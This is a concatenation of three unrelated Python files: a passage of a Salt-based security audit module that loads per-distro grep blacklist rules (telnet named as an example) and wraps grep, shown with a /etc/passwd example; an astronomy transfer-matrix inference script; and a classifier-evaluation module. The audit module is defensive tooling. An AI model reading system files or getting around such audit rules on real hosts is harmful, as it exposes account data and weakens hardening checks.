    Retrieve all the tags for this distro from the yaml

    Returns a dict mapping each audit tag to a list of formatted rule
    dicts ({'name', 'tag', 'module', 'type', ...}) applicable to the
    osfinger of the current minion.
    '''
    ret = {}
    distro = __grains__.get('osfinger')
    # .items() instead of the Python-2-only .iteritems() throughout, so the
    # module works on both Python 2 and 3.
    for toplist, toplevel in data.get('grep', {}).items():
        # grep:blacklist
        for audit_dict in toplevel:
            # grep:blacklist:0
            for audit_id, audit_data in audit_dict.items():
                # grep:blacklist:0:telnet
                tags_dict = audit_data.get('data', {})
                # grep:blacklist:0:telnet:data
                tags = None
                # Find the first osfinger entry matching this distro;
                # comma-separated globs are supported within one key.
                for osfinger in tags_dict:
                    if osfinger == '*':
                        continue
                    osfinger_list = [finger.strip() for finger in osfinger.split(',')]
                    for osfinger_glob in osfinger_list:
                        if fnmatch.fnmatch(distro, osfinger_glob):
                            tags = tags_dict.get(osfinger)
                            break
                    if tags is not None:
                        break
                # If we didn't find a match, check for a '*'
                if tags is None:
                    tags = tags_dict.get('*', [])
                # grep:blacklist:0:telnet:data:Debian-8
                if isinstance(tags, dict):
                    # malformed yaml, convert to list of dicts
                    tmp = []
                    for name, tag in tags.items():
                        tmp.append({name: tag})
                    tags = tmp
                for item in tags:
                    for name, tag in item.items():
                        tag_data = {}
                        # Whitelist could have a dictionary, not a string
                        if isinstance(tag, dict):
                            tag_data = copy.deepcopy(tag)
                            tag = tag_data.pop('tag')
                        if tag not in ret:
                            ret[tag] = []
                        formatted_data = {'name': name,
                                          'tag': tag,
                                          'module': 'grep',
                                          'type': toplist}
                        formatted_data.update(tag_data)
                        formatted_data.update(audit_data)
                        formatted_data.pop('data')
                        ret[tag].append(formatted_data)
    return ret
def _grep(path,
          pattern,
          *args):
    '''
    Grep for a string in the specified file

    .. note::
        This function's return value is slated for refinement in future
        versions of Salt

    path
        Path to the file to be searched

        .. note::
            Globbing is supported (i.e. ``/var/log/foo/*.log``, but if globbing
            is being used then the path should be quoted to keep the shell from
            attempting to expand the glob expression.

    pattern
        Pattern to match. For example: ``test``, or ``a[0-5]``

    opts
        Additional command-line flags to pass to the grep command. For example:
        ``-v``, or ``-i -B2``

        .. note::
            The options should come after a double-dash (as shown in the
            examples below) to keep Salt's own argument parser from
            interpreting them.

    CLI Example:

    .. code-block:: bash

        salt '*' file.grep /etc/passwd nobody
        salt '*' file.grep /etc/sysconfig/network-scripts/ifcfg-eth0 ipaddr -- -i
        salt '*' file.grep /etc/sysconfig/network-scripts/ifcfg-eth0 ipaddr -- -i -B2
        salt '*' file.grep "/etc/sysconfig/network-scripts/*" ipaddr -- -i -l
    '''
    path = os.path.expanduser(path)

    # Fold any extra CLI flags into a single options string (empty when none).
    options = ' '.join(args) if args else ''
    cmd = 'grep {0} {1} {2}'.format(options, pattern, path)

    try:
        return __salt__['cmd.run_all'](cmd, python_shell=False, ignore_retcode=True)
    except (IOError, OSError) as exc:
        raise CommandExecutionError(exc.strerror)
| |
#!/usr/bin/env python
import desdb
import numpy as np
import esutil
import pyfits
import sys
import healpy as hp
#from mpi4py import MPI
#import mpifunctions
#import DBfunctions
import numpy as np
import scipy.spatial
import scipy.interpolate
from sklearn.neighbors import NearestNeighbors
import numpy.lib.recfunctions as recfunctions
import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
import testInference_galmag as huff
def MagNoise(m, z=30):
    """Return magnitudes m with flux-dependent Gaussian scatter and a smooth
    arctan bias added; z is the magnitude zeropoint."""
    flux = np.power(10.0, (z - m) / 2.5)
    scatter = np.power(flux, -0.5) * np.random.randn(len(m)) * 3
    bias = (np.pi / 2 + np.arctan(m - z)) / (np.pi * 5)
    return m + scatter + bias
def RandomType(n, min, max, kind, extra=None):
    """
    Draw ``n`` random samples from the distribution named by ``kind``.

    min, max : range endpoints (names kept for callers; they shadow builtins)
        'uniform'  -> uniform on [min, max)
        'gaussian' -> min + 4 * N(0, 1)  (max is ignored)
        'beta'     -> min + Beta(a, b) * (max - min); extra = [a, b], default [5, 3]
        'power'    -> min + Power(a) * (max - min);  extra = a, default 2
    extra : distribution shape parameter(s), see above.

    Raises ValueError for an unknown ``kind`` (previously returned None
    silently, which surfaced later as confusing downstream errors).
    """
    if kind == 'uniform':
        return np.random.uniform(min, max, n)
    elif kind == 'gaussian':
        return min + np.random.randn(n) * 4
    elif kind == 'beta':
        # 'is None' instead of '== None': identity test is the correct
        # (and array-safe) way to detect a missing argument
        if extra is None:
            extra = [5, 3]
        return min + np.random.beta(extra[0], extra[1], n) * (max - min)
    elif kind == 'power':
        if extra is None:
            extra = 2
        return min + np.random.power(extra, n) * (max - min)
    raise ValueError("unknown distribution kind: %r" % (kind,))
def GetBalrogTruth(n, min, max, kind, truthkey, extra=None):
    """Draw n truth magnitudes from the requested distribution and wrap them
    in a one-field structured array keyed by truthkey."""
    samples = RandomType(n, min, max, kind, extra=extra)
    catalog = np.zeros(n, dtype=[(truthkey, np.float64)])
    catalog[truthkey] = samples
    return catalog
def GetBalrogObserved(a, falloff, wfalloff, simkey, truthkey):
    """Simulate detection and measurement of catalog ``a``: keep each object
    with probability exp(-(mag-16)/2.5), add noise to the kept magnitudes,
    and return the survivors with a new ``simkey`` column.

    NOTE: falloff/wfalloff are currently unused; the thresholds are hard-coded.
    """
    catalog = np.copy(a)
    prob = np.exp(-(catalog[truthkey] - 16) / 2.5)
    kept = np.random.random(len(catalog)) < prob
    survivors = catalog[kept]
    noisy = MagNoise(survivors[truthkey])
    return recfunctions.append_fields(survivors, simkey, noisy)
def GetDESTruth(n, min, max, kind, truthkey, extra=None):
    """Build a mock DES truth catalog: n draws from the requested
    distribution, stored in a one-field structured array under truthkey."""
    samples = RandomType(n, min, max, kind, extra=extra)
    catalog = np.zeros(n, dtype=[(truthkey, np.float64)])
    catalog[truthkey] = samples
    return catalog
class BalrogInference(object):
    """
    Builds the Balrog transfer matrix and selection window function.

    TransferMatrix maps binned truth quantities to binned observed
    quantities, estimated from the detected simulation catalog ``data``;
    WindowFunction returns the fraction of injected truth objects
    (from ``truth``) that were detected, per truth bin.
    """

    def __init__(self, config, data, truth):
        # config supplies parallel lists of column names and bin-edge arrays
        # for the truth and observed spaces.
        self.TruthColumns = config['truth_columns']
        self.TruthBins = config['truth_bins']
        self.ObsColumns = config['obs_columns']
        self.ObsBins = config['obs_bins']
        self.data = data    # detected catalog; must also carry the truth columns
        self.truth = truth  # full injected truth catalog
        self.TransferMatrix = self.Data2TransferMatrix()

    def Data2TransferMatrix(self):
        """
        Histogram the observed quantities of detected objects, grouped by
        (flattened multi-dimensional) truth bin, into an
        (NObsBins x NTruthBins) matrix whose column i is the distribution of
        observed bins for truth bin i. Also records self.NObserved per bin.
        """
        SingleDimBinIndex = np.zeros((len(self.data), len(self.TruthColumns)), dtype=np.int64)
        DimFactor = np.ones(len(self.TruthColumns), dtype=np.int64)
        outside = np.zeros(len(self.data), dtype=np.bool_)
        NTruthBins = 1
        for i in range(len(self.TruthColumns)):
            neg = -(i + 1)
            NTruthBins = NTruthBins * (len(self.TruthBins[neg]) - 1)
            SingleDimBinIndex[:, i] = np.digitize(self.data[self.TruthColumns[neg]], bins=self.TruthBins[neg]) - 1
            # flag objects falling below the first or above the last edge
            outside = (outside) | ((SingleDimBinIndex[:, i] == -1) | (SingleDimBinIndex[:, i] == (len(self.TruthBins[neg]) - 1)))
            if i > 0:
                DimFactor[i] = (len(self.TruthBins[neg + 1]) - 1) * DimFactor[i - 1]
        DimFactor = np.reshape(DimFactor, (1, len(DimFactor)))
        BinIndex = np.sum(SingleDimBinIndex * DimFactor, axis=-1)
        # BUGFIX: boolean-mask negation must use ~; unary minus on boolean
        # arrays was deprecated and later removed in NumPy.
        d = recfunctions.append_fields(self.data, 'BinIndex', BinIndex)[~outside]
        d = np.sort(d, order='BinIndex')
        # split the sorted catalog into one group per truth bin
        binindex = np.arange(1, NTruthBins, 1)
        splitat = np.searchsorted(d['BinIndex'], binindex)
        BalrogByTruthIndex = np.split(d, splitat)
        self.NObserved = np.zeros(len(BalrogByTruthIndex))
        NObsBins = 1
        SingleDimBinSize = []
        for i in range(len(self.ObsColumns)):
            NObsBins = NObsBins * (len(self.ObsBins[i]) - 1)
            SingleDimBinSize.append(np.diff(self.ObsBins[i]))
        # Observed-space bin volumes via outer product; only used by the
        # density-style normalization that is currently commented out below.
        BinVolume = 1.0
        for i in range(len(SingleDimBinSize)):
            BinVolume = BinVolume * SingleDimBinSize[i]
            BinVolume = np.expand_dims(BinVolume, axis=-1)
        BinVolume = BinVolume.flatten()
        TransferMatrix = np.zeros((NObsBins, NTruthBins))
        for i in range(len(BalrogByTruthIndex)):
            ThisTruth = np.zeros((len(BalrogByTruthIndex[i]), len(self.ObsColumns)))
            for j in range(len(self.ObsColumns)):
                ThisTruth[:, j] = (BalrogByTruthIndex[i][self.ObsColumns[j]])
            hist, edge = np.histogramdd(ThisTruth, bins=self.ObsBins)
            #hist = hist / (BinVolume * len(ThisTruth))
            # normalize so each column is P(obs bin | truth bin)
            hist = hist / len(ThisTruth)
            self.NObserved[i] = len(ThisTruth)
            TransferMatrix[:, i] = hist.flatten()
        return TransferMatrix

    def WindowFunction(self):
        """Per-truth-bin detection fraction: N detected / N injected.
        Also caches the flattened injected histogram as self.TruthHist."""
        CanHist = np.zeros((len(self.truth), len(self.TruthColumns)))
        for i in range(len(self.TruthColumns)):
            CanHist[:, i] = self.truth[self.TruthColumns[i]]
        TruthHist, edge = np.histogramdd(CanHist, bins=self.TruthBins)
        self.TruthHist = TruthHist.flatten()
        return self.NObserved / self.TruthHist
if __name__=='__main__':
    # --- Configuration: one magnitude column each for truth ('mag') and the
    # --- noisy observation ('magauto'), binned on a common 0.2-mag grid.
    binsize = 0.2
    simkey = 'magauto'
    truthkey = 'mag'
    balrog_min = 16
    balrog_max = 28
    obs_min = 14
    obs_max = 29
    config = {'obs_columns': [simkey],
              'obs_bins': [np.arange(obs_min,obs_max,binsize)],
              'truth_columns': [truthkey],
              'truth_bins': [np.arange(balrog_min,balrog_max,binsize)]
              }
    # NOTE(review): float catalog sizes (1e7) rely on older numpy accepting
    # floats as array lengths — TODO confirm before upgrading numpy.
    n = 1e7
    ndes = 1e6
    falloff = 20
    wfalloff = 0.1
    # Build the Balrog (simulation) truth/observed pair and a mock DES
    # truth/observed pair with a steeper power-law slope.
    #truth = GetBalrogTruth(n, balrog_min, balrog_max, 'gaussian')
    #truth = GetBalrogTruth(n, balrog_min, config['truth_bins'][0][-1], 'power', extra=2)
    truth = GetBalrogTruth(n, balrog_min, balrog_max, 'power', truthkey, extra=2)
    observed = GetBalrogObserved(truth, falloff, wfalloff, simkey, truthkey)
    #des_truth = GetDESTruth(n, balrog_min, balrog_max, 'power', extra=3)
    #des_truth = GetDESTruth(n, balrog_min, config['truth_bins'][0][-1], 'power', extra=3)
    des_truth = GetDESTruth(ndes, balrog_min, balrog_max, 'power', truthkey, extra=3)
    des_observed = GetBalrogObserved(des_truth, falloff, wfalloff, simkey, truthkey)
    '''
    binsize = 0.2
    simkey = 'data'
    truthkey = 'data_truth'
    balrog_min = 15
    balrog_max = 25.8
    obs_min = 15
    obs_max = 28
    config = {'obs_columns': [simkey],
              'obs_bins': [np.arange(obs_min,obs_max,binsize)],
              'truth_columns': [truthkey],
              'truth_bins': [np.arange(balrog_min,balrog_max,binsize)]
              }
    # Generate a simulated simulated truth catalog.
    truth = huff.generateTruthCatalog(n_obj=1000000, slope=2.500, downsample=True)
    observed = huff.applyTransferFunction(truth, blend_fraction=0)
    des_truth = huff.generateTruthCatalog(n_obj=1000000, slope=2.50, downsample=False)
    des_observed = huff.applyTransferFunction(des_truth, blend_fraction=0)
    print len(truth)==len(des_truth)
    '''
    # Transfer matrix + window function from the simulation.
    BalrogObject = BalrogInference(config, observed, truth)
    tm = BalrogObject.TransferMatrix
    window = BalrogObject.WindowFunction()
    des_hist, edge = np.histogram(des_observed[simkey], bins=config['obs_bins'][0])
    # truth-bin centers, and an interpolator for the window function
    c = (config['truth_bins'][0][1:]+config['truth_bins'][0][:-1]) / 2.0
    wind = scipy.interpolate.interp1d(c, window)
    # Tikhonov-style regularization strengths for the inversion below.
    reg1 = 1.0e-12
    reg2 = np.power(10.0, -8)
    #reg1 = 0
    #reg2 = 0
    prior = np.zeros(tm.shape[1])
    prior_cov_inv = reg2 * np.identity(tm.shape[1])
    '''
    prior_cov_inv = np.zeros( (tm.shape[1],tm.shape[1]) )
    prior_cov_inv[0,0] = -1
    prior_cov_inv[-1,-1] = 1
    for i in range(prior_cov_inv.shape[0]-1):
        prior_cov_inv[i, i+1] = 1
        prior_cov_inv[i+1, i] = -1
    #prior_cov_inv = np.dot(tm*window, prior_cov_inv)
    #prior_cov_inv = np.dot(np.transpose(prior_cov_inv), prior_cov_inv)
    #prior_cov_inv = np.dot(np.transpose(prior_cov_inv), prior_cov_inv) / 100000
    '''
    # Scale the prior by the (window-corrected) total count in the overlap
    # of the obs and truth bin ranges.
    cc = (config['obs_bins'][0][1:]+config['obs_bins'][0][:-1]) / 2.0
    cut = (cc > c[0]) & (cc < c[-1])
    factor = np.sum(des_hist[cut] / wind(cc[cut]) )
    #prior_cov_inv = np.dot(np.transpose(prior_cov_inv), prior_cov_inv) / (factor*factor)
    prior_cov_inv = np.dot(np.transpose(prior_cov_inv), prior_cov_inv) / (factor)
    '''
    c_obs = (config['obs_bins'][0][1:]+config['obs_bins'][0][:-1]) / 2.0
    prior = des_hist / wind(c_obs)
    #prior = des_hist
    prior_cov_inv = np.linalg.inv( np.diag(prior) )
    print prior.shape, des_hist.shape
    '''
    # Regularized least-squares inversion of the transfer matrix:
    # tm_inv = (T' C^-1 T + P)^-1 T' C^-1, applied to the observed histogram.
    descov = np.diag(des_hist + reg1)
    descov_inv = np.linalg.inv(descov)
    rcr_inv = np.linalg.inv( np.dot( np.transpose(tm), np.dot(descov_inv,tm) ) + prior_cov_inv)
    #rcd = np.dot(np.transpose(tm), np.dot(descov_inv, des_hist)) + np.dot(prior_cov_inv, prior)
    #des_corr = np.dot(rcr_inv, rcd)
    #des_recon = des_corr / window
    tm_inv = np.dot(rcr_inv, np.dot(np.transpose(tm), descov_inv))
    des_corr = np.dot(tm_inv, des_hist)
    des_recon = des_corr / window
    #cut = (c > 24)
    #print c[cut], wind(c[cut]), des_hist[cut], des_recon[cut]
    #print c, wind(c), des_hist, des_recon
    # Error estimates: shot noise propagated through the resolution matrix
    # (tm_inv . tm) and a leakage term from its off-diagonal structure.
    shot = np.diag(des_recon)
    get_back = np.dot(tm_inv, tm)
    shot_rec = np.dot(get_back, np.dot(shot, np.transpose(get_back)))
    shot_recon = np.diag(shot_rec)
    #leakage_recon = np.dot( tm_inv, np.dot(tm, window*des_recon) - des_hist ) / window - des_recon
    leakage_recon = np.dot( (get_back - np.identity(len(des_recon))), des_recon)
    #leakage_recon = np.dot( (get_back - np.identity(len(des_recon))), des_recon) / window
    #leakage_recon = np.dot( (get_back - np.identity(len(des_recon))), des_recon)
    #leakage_recon = np.dot( (get_back - np.diag(get_back)), des_recon)
    #leakage_recon = np.dot( np.transpose(get_back - np.diag(get_back)), des_recon)
    #err_recon = np.sqrt( shot_recon + np.power(leakage_recon,2.0) )
    err_recon = leakage_recon
    '''
    des_hist, edge = np.histogram(des_observed[simkey], bins=config['obs_bins'][0])
    des_cov = np.diag(des_hist)
    des_invcov = np.linalg.inv(des_cov)
    print des_invcov
    '''
    # Figure 1: the transfer matrix itself.
    plt.figure(1)
    #tm = Balrog2TransferMatrix(observed, config['truth_columns'], config['truth_bins'], config['obs_columns'], config['obs_bins'])
    im = plt.imshow(tm, origin='lower', extent=[balrog_min,balrog_max,obs_min,obs_max], interpolation='nearest')
    plt.plot( [balrog_min,balrog_max],[balrog_min,balrog_max], color='black' )
    plt.colorbar()
    # Figure 2: truth/observed histograms plus the reconstruction.
    plt.figure(2)
    #bins = np.arange(14, 30, binsize)
    bins = config['truth_bins'][0]
    center = (bins[1:]+bins[:-1])/2.0
    bt, bins = np.histogram(truth[truthkey], bins=bins)
    bo, bins = np.histogram(observed[simkey], bins=bins)
    dt, bins = np.histogram(des_truth[truthkey], bins=bins)
    do, bins = np.histogram(des_observed[simkey], bins=bins)
    plt.plot(center, bt, color='blue', label='Sim truth')
    plt.plot(center, bo, color='green', label='Sim observed')
    plt.plot(center, dt, color='red', label='Data truth')
    plt.plot(center, do, color='magenta', label='Data observed')
    #leakage_recon = np.dot( (get_back - np.identity(len(des_recon))), dt) / window
    #leakage_recon = np.dot( (get_back - np.identity(len(des_recon))), dt)
    c = (config['truth_bins'][0][1:]+config['truth_bins'][0][:-1])/2.0
    # Python 2 print statement — this script is py2-only as written.
    print len(c), len(des_corr)
    #plt.plot(c, des_corr, color='black', label='DES no window correction')
    plt.scatter(c, des_recon, color='black', label='Reconstruction', s=3)
    plt.scatter(c, prior, color='cyan', label='prior', s=3)
    #plt.errorbar(c, des_recon, yerr=err_recon, color='black', fmt='o', markersize=3,label='Reconstruction')
    # NOTE(review): 'yerrcolor' is not a standard matplotlib errorbar kwarg
    # and fmt=None is rejected by newer matplotlib (use fmt='none') — these
    # calls presumably worked only on an old matplotlib; verify.
    plt.errorbar(c, des_recon, yerr=np.sqrt(shot_recon), yerrcolor='black', fmt=None, markersize=3,label='shot noise')
    plt.errorbar(c, des_recon, yerr=leakage_recon, yerrcolor='cyan', fmt=None, markersize=3,label='leakage')
    plt.legend(loc='best', ncol=2)
    #plt.legend(loc='upper left')
    #plt.ylim([1,1e5])
    plt.ylim([1,1e7])
    #plt.xlim([16,28])
    plt.xlim([16,28])
    plt.yscale('log')
    #plt.xscale('log')
    plt.show()
| |
# coding: utf-8
import os
import gc
import copy
import csv
import time
import logging
import numpy as np
import pandas as pd
import scipy as sp
import seaborn as sns
import sklearn.model_selection as skms
import matplotlib.pyplot as plt
from sklearn import metrics
from sklearn.base import clone
from sklearn.utils.multiclass import unique_labels
from sklearn.utils.fixes import bincount
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics.classification import _prf_divide
from sklearn.pipeline import Pipeline
from sklearn.externals import joblib
import preprocessing as prep
import util
__author__ = 'Marcin Kowiel, Dariusz Brzezinski'
class Metrics:
    """
    Bundle of classification scores for one prediction set, optionally
    restricted to the examples whose resolution lies in (low, high].
    Failed/absent inputs yield the sentinel value -1.
    """
    def __init__(self, y_true, y_pred, y_prob, y_resolution, resolution_range=None):
        if resolution_range is not None:
            # keep only examples inside the requested resolution interval
            in_range = (y_resolution > resolution_range[0]) & (y_resolution <= resolution_range[1])
            subset = np.arange(0, y_true.shape[0])[in_range]
            y_true = y_true.iloc[subset]
            y_pred = y_pred[subset]
            if y_prob is not None:
                y_prob = y_prob[subset]
        self.resolution_range = resolution_range
        self.subset_size = y_true.shape[0]
        self.n_classes = y_true.nunique()
        has_truth = y_true is not None
        self.accuracy = metrics.accuracy_score(y_true, y_pred) if has_truth else -1
        self.top_5_accuracy = top_n_accuracy(y_true, y_prob, top_n=5) if has_truth else -1
        self.top_10_accuracy = top_n_accuracy(y_true, y_prob, top_n=10) if has_truth else -1
        self.top_20_accuracy = top_n_accuracy(y_true, y_prob, top_n=20) if has_truth else -1
        self.macro_recall = metrics.recall_score(y_true, y_pred, average="macro") if has_truth else -1
        self.kappa = metrics.cohen_kappa_score(y_true, y_pred) if has_truth else -1
        self.gmean = g_mean(y_true, y_pred) if has_truth else -1
        self.brier = brier_score_loss_for_true_class(y_true, y_prob) if has_truth else -1
        self.worst_prediction_rank = worst_prediction_rank(y_true, y_prob) if has_truth else -1
class Evaluation:
    """
    Evaluation results for a given classifier on a given dataset.
    """
    # NOTE(review): resolution_ranges below is a mutable default argument;
    # safe only while it is never mutated in place.
    def __init__(self, dataset_name, preprocessing, classifier, search_params, y_true, y_pred, y_prob, y_resolution,
                 search_results, evaluation_metric, training_time, testing_time,
                 resolution_ranges=[(0.0, 1.5), (1.5, 2.0), (2.0, 3.0), (3.0, 4.0)]):
        """
        Constructor.
        :param dataset_name: Dataset name
        :type dataset_name: string
        :param preprocessing: Global preprocessing applied to the dataset.
        :type preprocessing: Preprocessing
        :param classifier: Evaluated classifier
        :type classifier: BaseEstimator
        :param search_params: Parameter grid used if model selection was performed
        :type: search_params: dict
        :param y_true: True class labels for test data
        :type y_true: list
        :param y_pred: Predicted class labels for test data
        :type y_pred: list
        :param y_prob: Predicted probabilities of each class for each example
        :type y_prob: array-like
        :param search_results: Grid search results
        :type search_results: GridSearchCV
        :param evaluation_metric: Evaluation metric used to select best model during grid search
        :type evaluation_metric: string
        :param processing_time: Evaluation time in seconds
        :type processing_time: int
        """
        self.dataset_name = dataset_name
        self.dataset_stats = util.DatasetStatistics(preprocessing.data_frame, preprocessing.class_series)
        self.preprocessing = preprocessing
        self.classifier = classifier
        self.search_params = search_params
        self.y_true = y_true
        self.y_pred = y_pred
        self.y_prob = y_prob
        self.y_resolution = y_resolution
        self.resolution_ranges = resolution_ranges
        self.search_results = search_results
        # std of the CV score for the selected (best) parameter set
        self.best_std = search_results.cv_results_["std_test_score"][search_results.best_index_] \
            if search_results is not None else None
        self.evaluation_metric = evaluation_metric
        self.training_time = training_time
        self.testing_time = testing_time
        # overall metrics plus one Metrics bundle per resolution range
        self.metrics = Metrics(y_true, y_pred, y_prob, y_resolution, resolution_range=None)
        self.resolution_metrics = []
        if resolution_ranges is not None and len(resolution_ranges) > 0:
            for resolution_range in resolution_ranges:
                self.resolution_metrics.append(Metrics(y_true, y_pred, y_prob, y_resolution, resolution_range))
        self.num_of_classes = self.dataset_stats.num_of_classes
        # start time reconstructed by subtracting the measured durations from now
        self.start_date_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(time.time()-training_time-testing_time))
        self.end_date_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())

    def __repr__(self):
        """
        Returns a string representation of an evaluation. Basic statistics in a readable form.
        :return: evaluation score names and values
        """
        return "Results:\r\n" \
               + "\tStart: {0}".format(self.start_date_time) + "\r\n" \
               + "\tEnd: {0}".format(self.end_date_time) + "\r\n" \
               + "\tTraining time: {0:.0f} s".format(self.training_time) + "\r\n" \
               + "\tTesting time: {0:.0f} s".format(self.testing_time) + "\r\n" \
               + "\tEvaluation metric: {0}".format(self.evaluation_metric) + "\r\n" \
               + "\tCV params: {0}".format(self.search_results.best_params_
                                           if self.search_results is not None else None) + "\r\n" \
               + "\tAverage CV score: {0:.3f}".format(self.search_results.best_score_
                                                      if self.search_results is not None else -1) + "\r\n" \
               + "\tCV std: {0:.3f}".format(self.best_std if self.best_std is not None else -1) + "\r\n" \
               + "\tAccuracy: {0:.3f}".format(self.metrics.accuracy) + "\r\n" \
               + "\tTop-5 accuracy: {0:.3f}".format(self.metrics.top_5_accuracy) + "\r\n" \
               + "\tTop-10 accuracy: {0:.3f}".format(self.metrics.top_10_accuracy) + "\r\n" \
               + "\tTop-20 accuracy: {0:.3f}".format(self.metrics.top_20_accuracy) + "\r\n" \
               + "\tMacro recall: {0:.3f}".format(self.metrics.macro_recall) + "\r\n" \
               + "\tKappa: {0:.3f}".format(self.metrics.kappa) + "\r\n" \
               + "\tG-mean: {0:.3f}".format(self.metrics.gmean) + "\r\n" \
               + "\tBrier score: {0:.3f}".format(self.metrics.brier) + "\r\n" \
               + "\tWorst prediction rank: {0}/{1}".format(self.metrics.worst_prediction_rank, str(self.num_of_classes))

    def write_to_csv(self, file_name="ExperimentResults.csv",
                     save_to_folder=os.path.join(os.path.dirname(__file__), "ExperimentResults"), fold_num=None):
        """
        Adds a new row to a csv file with evaluation results. If the given filename does not correspond to any existing
        csv, a new file is created.
        :param file_name: csv file name
        :type file_name: string
        :param save_to_folder: folder to save the file to
        :type save_to_folder: string, optional (default=source file folder/ExperimentResults)
        """
        if not os.path.exists(save_to_folder):
            os.mkdir(save_to_folder)
        file_path = os.path.join(save_to_folder, file_name)
        # append to an existing results file, otherwise create it with a header
        if os.path.isfile(file_path):
            write_header = False
            mode = "a"
        else:
            write_header = True
            mode = "w"
        with open(file_path, mode) as f:
            writer = csv.writer(f, delimiter=',', quoting=csv.QUOTE_NONNUMERIC, lineterminator='\n')
            if write_header:
                header = ["Start date",
                          "End date",
                          "Dataset",
                          "Fold",
                          "Examples",
                          "Attributes",
                          "Number of classes",
                          "Min class examples",
                          "Max class examples",
                          "Classes",
                          "Preprocessing",
                          "Grid",
                          "Grid metric",
                          "Pipeline",
                          "Classifier",
                          "Training time",
                          "Testing time",
                          "Best CV parameters",
                          "Best average CV score",
                          "CV scores",
                          "CV standard deviation"]
                metric_names = ["Accuracy", "Top 5 acc.", "Top 10 acc.", "Top 20 acc.", "Macro recall", "Kappa",
                                "G-mean", "Brier score", "Worst prediction rank"]
                header.extend(metric_names)
                # one extra column group per resolution range
                for resolution_metric in self.resolution_metrics:
                    header.extend([m + " " + str(resolution_metric.resolution_range) for m in metric_names])
                writer.writerow(header)
            row = [self.start_date_time,
                   self.end_date_time,
                   self.dataset_name,
                   fold_num if fold_num is not None else "",
                   self.dataset_stats.examples,
                   self.dataset_stats.attributes,
                   self.dataset_stats.num_of_classes,
                   self.dataset_stats.min_examples,
                   self.dataset_stats.max_examples,
                   # .iteritems() makes this Python-2-only
                   " ".join([str(key) + ": " + str(value)
                             for key, value in self.dataset_stats.classes.iteritems()]),
                   self.preprocessing,
                   self.search_params,
                   self.evaluation_metric,
                   util.deep_repr(self.classifier).replace('\n', ' ').replace('\r', ''),
                   util.classifier_repr(self.classifier).replace('\n', ' ').replace('\r', ''),
                   self.training_time,
                   self.testing_time,
                   self.search_results.best_params_ if self.search_results is not None else "",
                   self.search_results.best_score_ if self.search_results is not None else "",
                   self.search_results.cv_results_ if self.search_results is not None else "",
                   self.best_std]
            # NOTE(review): the loop variable shadows the sklearn ``metrics``
            # module inside this method (harmless here, but confusing).
            for metrics in [self.metrics] + self.resolution_metrics:
                row.extend([metrics.accuracy, metrics.top_5_accuracy, metrics.top_10_accuracy, metrics.top_20_accuracy,
                            metrics.macro_recall, metrics.kappa, metrics.gmean, metrics.brier,
                            metrics.worst_prediction_rank])
            writer.writerow(row)

    def save_predictions(self, save_to_folder=os.path.join(os.path.dirname(__file__), "ExperimentResults")):
        # Per-example prediction dump: predicted/true class, their
        # probabilities, the rank of the true class, resolution and rscc.
        try:
            y_true_prob = self.y_prob[np.arange(len(self.y_prob)), self.y_true]\
                if self.y_prob is not None else pd.DataFrame(np.zeros((len(self.y_true), 1)))
        # NOTE(review): bare except silently degrades to a scalar 0 column
        except:
            y_true_prob = 0
        y_pred_prob = self.y_prob[np.arange(len(self.y_prob)), self.y_pred] \
            if self.y_prob is not None else pd.DataFrame(np.zeros((len(self.y_true), 1)))
        classes = self.y_prob.shape[1]
        sorted_pred = np.argsort(self.y_prob, axis=1)
        # rank 1 = true class had the highest predicted probability
        rank = classes - np.apply_along_axis(np.where, 1, np.equal(sorted_pred, np.repeat(self.y_true[:, np.newaxis],
                                                                                          classes, 1))).flatten()
        rscc = np.full((len(self.y_true), 1), np.nan).flatten()
        if self.preprocessing.validation_data is not None:
            try:
                validation_df = prep.read_validation_data(self.preprocessing.validation_data)
            # NOTE(review): bare except; falls back to the default dataset path
            except:
                DATA_FOLDER = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'Data'))
                VALIDATION_DATASET_PATH = os.path.join(DATA_FOLDER, "validation_all.csv")
                validation_df = prep.read_validation_data(VALIDATION_DATASET_PATH)
            validation_df = validation_df.drop_duplicates(subset="title", keep="first")
            rscc = pd.DataFrame({"title": self.y_true.index, "pred": self.y_true.values}).merge(validation_df, on="title", how="left").loc[:, "rscc"].values
        predictions = pd.DataFrame({"y_true": self.preprocessing.classes[self.y_true],
                                    "y_pred": self.preprocessing.classes[self.y_pred],
                                    "y_true_prob": y_true_prob,
                                    "y_pred_prob": y_pred_prob,
                                    "prob_diff": y_pred_prob - y_true_prob,
                                    "is_correct": self.y_true == self.y_pred,
                                    "rank": rank,
                                    "resolution": self.y_resolution,
                                    "rscc": rscc},
                                   index=self.y_true.index,
                                   columns=["y_pred", "y_true", "y_pred_prob", "y_true_prob",
                                            "prob_diff", "is_correct", "rank", "resolution", "rscc"])
        predictions.to_csv(os.path.join(save_to_folder, _get_file_name(self.dataset_name, self.classifier,
                                                                       "predictions", "csv")))

    def save_model(self, save_to_folder=os.path.join(os.path.dirname(__file__), "ExperimentResults")):
        # Serialize the fitted classifier pipeline to a .pkl file.
        util.save_model(self.classifier, os.path.join(save_to_folder, _get_file_name(self.dataset_name, self.classifier, "model", "pkl")))

    def save_feature_importance(self, plot=False, save_to_folder=os.path.join(os.path.dirname(__file__),
                                                                              "ExperimentResults")):
        # Extract per-feature importances from the pipeline's final estimator
        # (tree importances, or summed absolute coefficients for linear models)
        # and write them sorted to CSV; optionally render an interactive plot.
        sns.set_style("whitegrid")
        classifier = self.classifier.steps[-1][1]
        classifier_name = str(classifier)[:str(classifier).index("(")]
        column_names = list(self.preprocessing.data_frame)
        try:
            blobber = self.classifier.named_steps['preprocessor']
            column_names = blobber.column_names
        except KeyError:
            logging.warning("No BlobberPreprocessor in pipeline when attempting to plot feature importance.")
        try:
            # narrow the column list to the features kept by RFE, if present
            rfecv = self.classifier.named_steps['rfe']
            column_names = column_names[rfecv.support_]
        except KeyError:
            pass
        try:
            importances = classifier.feature_importances_
        except AttributeError:
            try:
                importances = np.absolute(classifier.coef_).sum(axis=0)/np.absolute(classifier.coef_).sum()
            except (ValueError, AttributeError):
                logging.warning("Classifier does not support feature importance")
                return
        indices = np.argsort(importances)[::-1]
        importance_df = pd.DataFrame(
            {"attribute": column_names[indices],
             "importance": importances[indices]},
            index=range(len(column_names)),
